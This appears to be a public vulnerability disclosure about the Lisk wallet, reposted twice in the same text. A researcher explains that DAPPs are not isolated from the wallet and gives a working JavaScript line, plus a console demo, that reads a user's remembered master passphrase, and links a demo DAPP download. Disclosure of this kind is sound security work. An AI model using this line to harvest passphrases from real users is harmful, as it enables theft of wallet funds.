whitj00/lisk.txt Secret

## lisk.txt
I would highly reccomend that lisk users not run DAPPs unless they have audited every single line of code in it beforehand, here's why:

2 months ago, I reported a vulnerablity to Lisk for their bug bounty where any DAPP could access a user's master password with a single line of JS.  Even though my experience with the bug bounty program was less than stellar, I won't go into that here.  The main point is that Lisk has known about this bug for 2 months and has not fixed it, which poses a massive security risk to users who don't have the time, knowledge, or motivation to verify the safety of DAPPs.

In my opinion it is dangerous to release a coin with smart contracts without making sure users funds are secure, regardless of how many warnings you give them.  I am disclosing this vulnerability below, not because I want users funds to be stolen, but because I believe it's more dangerous to have this unknown to users and known to people who may use this for malicious purposes and I hope that making this public will encourage the Lisk team to fix the security model of DAPPs.

To access a users password in a dapp, you can use the following:

> var liskpass = window.opener.angular.element(window.opener.document).injector().get('userService').rememberedPassphrase;

This is because DAPPs are not isolated in the browser from the lisk wallet, which opens up serious flaws beyond just this.

If you would like to demo without creating a dapp (this method simulates opening a dapp and running the code), simply log into the lisk client (with remember password enabled) and type into the JS console:

> window.open("/");

It will open a new browser page, and in that page's console type

> console.log(window.opener.angular.element(window.opener.document).injector().get('userService').rememberedPassphrase);

and you should see your passphrase.

If you would like to demo with an actual DAPP, you can install this:

https://whitjack.me/lisk/guestbookdapp-master.zip

which will show you your passphrase, but will not do anything else with it (you should definitely verify this code though, don't take my word for it)


~ Whit
	I would highly reccomend that lisk users not run DAPPs unless they have audited every single line of code in it beforehand, here's why:

	2 months ago, I reported a vulnerablity to Lisk for their bug bounty where any DAPP could access a user's master password with a single line of JS. Even though my experience with the bug bounty program was less than stellar, I won't go into that here. The main point is that Lisk has known about this bug for 2 months and has not fixed it, which poses a massive security risk to users who don't have the time, knowledge, or motivation to verify the safety of DAPPs.

	In my opinion it is dangerous to release a coin with smart contracts without making sure users funds are secure, regardless of how many warnings you give them. I am disclosing this vulnerability below, not because I want users funds to be stolen, but because I believe it's more dangerous to have this unknown to users and known to people who may use this for malicious purposes and I hope that making this public will encourage the Lisk team to fix the security model of DAPPs.

	To access a users password in a dapp, you can use the following:

	> var liskpass = window.opener.angular.element(window.opener.document).injector().get('userService').rememberedPassphrase;

	This is because DAPPs are not isolated in the browser from the lisk wallet, which opens up serious flaws beyond just this.

	If you would like to demo without creating a dapp (this method simulates opening a dapp and running the code), simply log into the lisk client (with remember password enabled) and type into the JS console:

	> window.open("/");

	It will open a new browser page, and in that page's console type

	> console.log(window.opener.angular.element(window.opener.document).injector().get('userService').rememberedPassphrase);

	and you should see your passphrase.

	If you would like to demo with an actual DAPP, you can install this:

	https://whitjack.me/lisk/guestbookdapp-master.zip

	which will show you your passphrase, but will not do anything else with it (you should definitely verify this code though, don't take my word for it)


	~ Whit